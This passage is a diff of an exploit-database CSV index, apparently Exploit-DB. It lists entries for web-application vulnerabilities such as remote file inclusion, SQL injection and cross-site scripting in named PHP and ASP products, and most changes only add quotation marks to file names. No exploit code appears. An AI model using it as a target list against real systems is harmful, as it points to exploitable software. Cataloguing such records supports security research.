Scripting",2006-10-02,meto5757,php,webapps,0 28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0 @@ -30672,7 +30676,7 @@ id,file,description,date,author,platform,type,port 28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 - Uyegiris.asp SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0 28769,platforms/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,php,webapps,0 -28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - functions.inc.php Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 +28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - ISEARCH_PATH Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0 28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 @@ -30680,20 +30684,20 @@ id,file,description,date,author,platform,type,port 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0 28778,platforms/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal Information Disclosure",2006-10-16,"Derek Callaway",php,webapps,0 28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 - 'Getimg.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 -28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 -28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 -28782,platforms/php/webapps/28782.txt,"Tagit2b - DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 - 'GoogleSearch.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +28782,platforms/php/webapps/28782.txt,"Tagit2b - 'DelTagUser.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0 28784,platforms/php/webapps/28784.txt,"Gcards 1.13 - 'Addnews.php' Remote File Inclusion",2006-10-11,"DeatH VirUs",php,webapps,0 -28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 - bug.php Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 +28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 - 'bug.php' Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0 28790,platforms/php/webapps/28790.txt,"phpList 2.x - Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",php,webapps,0 -28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - config.php Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0 +28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0 28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - admin_events.php CONFIG_EXT[LANGUAGES_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - mail.inc.php CONFIG_EXT[LIB_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28794,platforms/php/webapps/28794.txt,"4Images 1.7 - 'details.php' Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0 28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 - upload.php Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps,0 -28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0 +28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0 28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - 'index.php' page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28798,platforms/php/webapps/28798.txt,"Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28799,platforms/php/webapps/28799.txt,"Bloq 0.5.4 - rss.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 @@ -30701,21 +30705,21 @@ id,file,description,date,author,platform,type,port 28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - search.php Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0 -28804,platforms/php/webapps/28804.pl,"phpBB Add Name Module - Not_Mem.php Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +28804,platforms/php/webapps/28804.pl,"phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 28807,platforms/php/webapps/28807.py,"WHMCompleteSolution (WHMCS) 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0 28808,platforms/php/webapps/28808.txt,"WordPress Plugin Quick Contact Form 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps,0 -28814,platforms/php/webapps/28814.txt,"RamaCMS - ADODB.Inc.php Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps,0 -28815,platforms/php/webapps/28815.txt,"H-Sphere Webshell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0 -28818,platforms/php/webapps/28818.txt,"Mambo Module MOStlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0 -28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 - Calcul-page.php Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps,0 +28814,platforms/php/webapps/28814.txt,"RamaCMS - 'ADODB.Inc.php' Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps,0 +28815,platforms/php/webapps/28815.txt,"H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0 +28818,platforms/php/webapps/28818.txt,"Mambo Module MOStlyCE 4.5.4 - 'HTMLTemplate.php' Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0 +28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 - 'Calcul-page.php' Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps,0 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - 'index.php' Cross-Site Scripting",2006-10-17,Lostmon,php,webapps,0 -28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 +28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - 'Example6.php' Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 - Edit User HTML Injection",2006-10-16,MP,php,webapps,0 28824,platforms/php/webapps/28824.txt,"phpList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 - 'index.php' Cross-Site Scripting",2006-10-17,CorryL,php,webapps,0 28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - Rpc.php Unauthorized Access",2006-10-18,jonepet,php,webapps,0 28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusion",2006-10-18,Matdhule,php,webapps,0 -28828,platforms/php/webapps/28828.txt,"Zorum 3.5 - DBProperty.php Remote File Inclusion",2006-10-19,MoHaNdKo,php,webapps,0 +28828,platforms/php/webapps/28828.txt,"Zorum 3.5 - 'DBProperty.php' Remote File Inclusion",2006-10-19,MoHaNdKo,php,webapps,0 28829,platforms/asp/webapps/28829.txt,"Kinesis Interactive Cinema System - index.asp SQL Injection",2006-10-18,fireboy,asp,webapps,0 28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 - 'index.php' Remote File Inclusion",2006-10-19,"Alireza Ahari",php,webapps,0 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0 @@ -30735,13 +30739,13 @@ id,file,description,date,author,platform,type,port 28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - 'index.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - 'pwlost.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 -28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0 +28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0 28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0 -28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0 +28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0 28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 - Change_Pass.php Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps,0 28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 - dir.php Directory Traversal",2006-10-27,Christopher,php,webapps,0 -28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 - Bannieres.php Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps,0 +28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps,0 28869,platforms/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x - search.asp SQL Injection",2006-10-28,almaster,asp,webapps,0 28870,platforms/php/webapps/28870.txt,"PunBB 1.x - SQL Injection",2006-10-30,nmsh_sa,php,webapps,0 28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 - db/DataReaderWriter.php CONFIG_DB Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 @@ -30755,15 +30759,15 @@ id,file,description,date,author,platform,type,port 28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 - Htmlarea.php Cross-Site Scripting",2005-10-30,Vigilon,php,webapps,0 28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Inclusion",2006-10-31,MEFISTO,php,webapps,0 28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module - search.php SQL Injection",2006-10-31,Paisterist,php,webapps,0 -28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 - Configfunction.php Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 +28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28889,platforms/php/webapps/28889.txt,"Netquery 4.0 - NQUser.php Cross-Site Scripting",2006-10-31,"Tal Argoni",php,webapps,0 28890,platforms/php/webapps/28890.txt,"iPlanet Messaging Server - Messenger Express Expression() HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 28891,platforms/php/webapps/28891.txt,"Mirapoint Web Mail - 'Expression()' HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 28892,platforms/php/webapps/28892.txt,"RSSonate - Project_Root Parameter Remote File Inclusion",2006-11-01,Arab4services,php,webapps,0 -28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 - visEdit_Control.Class.php Remote File Inclusion",2006-11-08,igi,php,webapps,0 +28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 - 'visEdit_Control.Class.php' Remote File Inclusion",2006-11-08,igi,php,webapps,0 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x - Avatar Arbitrary File Upload",2006-11-02,securfrog,php,webapps,0 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 - 'index.php' SQL Injection",2006-11-02,Spiked,php,webapps,0 -28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 - Class.Database.php Remote File Inclusion",2006-11-07,navairum,php,webapps,0 +28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion",2006-11-07,navairum,php,webapps,0 28900,platforms/php/webapps/28900.txt,"ac4p Mobile - 'index.php' Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28901,platforms/php/webapps/28901.txt,"ac4p Mobile - 'MobileNews.php' Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28902,platforms/php/webapps/28902.txt,"ac4p Mobile - 'polls.php' Multiple Parameter Cross-Site Scripting (1)",2006-11-03,AL-garnei,php,webapps,0 @@ -30772,10 +30776,10 @@ id,file,description,date,author,platform,type,port 28905,platforms/php/webapps/28905.txt,"ac4p Mobile - cp/index.php pagenav Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 -28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 +28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 28909,platforms/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 - popup.php SQL Injection",2006-11-04,x23,php,webapps,0 -28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - Install.php3 Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0 +28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - 'Install.php3' Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 - NewList.php Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0 28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 @@ -30800,7 +30804,7 @@ id,file,description,date,author,platform,type,port 28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0 28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 - 'index.php' Cross-Site Scripting",2006-11-07,Dr.HAiL,php,webapps,0 -28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion",2006-11-08,ajann,php,webapps,0 +28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - 'Languages.Lib.php' Local File Inclusion",2006-11-08,ajann,php,webapps,0 28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 - Logon.aspx Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps,0 28942,platforms/php/webapps/28942.txt,"FreeWebShop 2.1/2.2 - 'index.php' page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 28943,platforms/php/webapps/28943.txt,"FreeWebShop 2.1/2.2 - 'index.php' cat Parameter Cross-Site Scripting",2006-11-08,"laurent gaffie",php,webapps,0 @@ -30849,7 +30853,7 @@ id,file,description,date,author,platform,type,port 29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 - viewlinks.asp categoryId Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 - addlisting.asp cat Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 -28998,platforms/php/webapps/28998.txt,"PHPdebug 1.1 - Debug_test.php Remote File Inclusion",2006-11-12,Firewall,php,webapps,0 +28998,platforms/php/webapps/28998.txt,"PHPdebug 1.1 - 'Debug_test.php' Remote File Inclusion",2006-11-12,Firewall,php,webapps,0 28999,platforms/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0 29000,platforms/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0 29001,platforms/php/webapps/29001.txt,"DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0 @@ -31060,7 +31064,7 @@ id,file,description,date,author,platform,type,port 29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 - form.php Multiple Parameter Cross-Site Scripting",2006-12-14,Mr_KaLiMaN,php,webapps,0 29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 - mod/forum/discuss.php navtail Parameter Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 -29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion",2006-12-16,Kacper,php,webapps,0 +29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion",2006-12-16,Kacper,php,webapps,0 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - Haber.asp SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 29298,platforms/php/webapps/29298.txt,"osTicket 1.2/1.3 Support Cards - view.php Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps,0 @@ -31176,8 +31180,8 @@ id,file,description,date,author,platform,type,port 29433,platforms/php/webapps/29433.txt,"Magic Photo Storage Website - user/user_extend.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29434,platforms/php/webapps/29434.txt,"Magic Photo Storage Website - user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29435,platforms/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",multiple,webapps,0 -29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - info.php Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0 -29438,platforms/php/webapps/29438.txt,"Edit-X - Edit_Address.php Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0 +29438,platforms/php/webapps/29438.txt,"Edit-X - 'Edit_Address.php' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 @@ -31263,10 +31267,10 @@ id,file,description,date,author,platform,type,port 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",php,webapps,0 36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection",2015-04-22,"TUNISIAN CYBER",php,webapps,80 29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,jsp,webapps,0 -29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion",2007-01-31,trzindan,php,webapps,0 +29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion",2007-01-31,trzindan,php,webapps,0 29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 - Login_Frame.php Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps,0 29559,platforms/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",php,webapps,0 -29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 - Lang.php Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0 +29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 - 'Lang.php' Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0 29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 - 'index.php' Cross-Site Scripting",2007-02-02,Doz,php,webapps,0 29562,platforms/php/webapps/29562.txt,"PortailPHP 2 - 'mod_news/index.php' chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 29563,platforms/php/webapps/29563.txt,"PortailPHP 2 - mod_news/goodies.php chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 @@ -31275,7 +31279,7 @@ id,file,description,date,author,platform,type,port 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 - mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps,0 29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusion",2007-02-05,anonymous,php,webapps,0 -29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 +29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Cross-Site Request Forgery (Change Admin Password)",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 - System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 29572,platforms/php/webapps/29572.txt,"cPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 @@ -31309,7 +31313,7 @@ id,file,description,date,author,platform,type,port 29606,platforms/php/webapps/29606.txt,"Calendar Express - search.php Cross-Site Scripting",2007-02-15,BL4CK,php,webapps,0 29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 - unistall.php Authentication Bypass",2007-02-26,r00t,php,webapps,0 29608,platforms/php/webapps/29608.txt,"CedStat 1.31 - 'index.php' hier Parameter Cross-Site Scripting",2007-02-16,sn0oPy,php,webapps,0 -29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 - Include.php Remote File Inclusion",2007-02-16,KaRTaL,php,webapps,0 +29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion",2007-02-16,KaRTaL,php,webapps,0 29610,platforms/php/webapps/29610.txt,"Ezboo Webstats 3.03 - Administrative Authentication Bypass",2007-02-16,sn0oPy,php,webapps,0 29611,platforms/asp/webapps/29611.txt,"Turuncu Portal 1.0 - H_Goster.asp SQL Injection",2007-02-16,chernobiLe,asp,webapps,0 29612,platforms/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router - Web-Console Password Change Bypass / Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,webapps,0 @@ -31332,12 +31336,12 @@ id,file,description,date,author,platform,type,port 29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 - 'step' Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 - 'load' Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 - 'id' Parameter Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0 -29640,platforms/php/webapps/29640.txt,"Shop Kit Plus - StyleCSS.php Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 +29640,platforms/php/webapps/29640.txt,"Shop Kit Plus - 'StyleCSS.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 - 'index.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 29642,platforms/php/webapps/29642.txt,"Simple one-file Gallery - gallery.php f Parameter Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0 29643,platforms/php/webapps/29643.txt,"Simple one-file Gallery - gallery.php f Parameter Cross-Site Scripting",2007-02-23,"laurent gaffie",php,webapps,0 -29644,platforms/php/webapps/29644.txt,"Pickle 0.3 - download.php Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps,0 -29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 - showcode.php Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps,0 +29644,platforms/php/webapps/29644.txt,"Pickle 0.3 - 'download.php' Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps,0 +29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 - 'showcode.php' Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps,0 29646,platforms/php/webapps/29646.txt,"Active Calendar 1.2 - data/flatevents.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29647,platforms/php/webapps/29647.txt,"Active Calendar 1.2 - data/js.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29648,platforms/php/webapps/29648.txt,"Active Calendar 1.2 - data/m_2.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 @@ -31381,7 +31385,7 @@ id,file,description,date,author,platform,type,port 30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client-Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 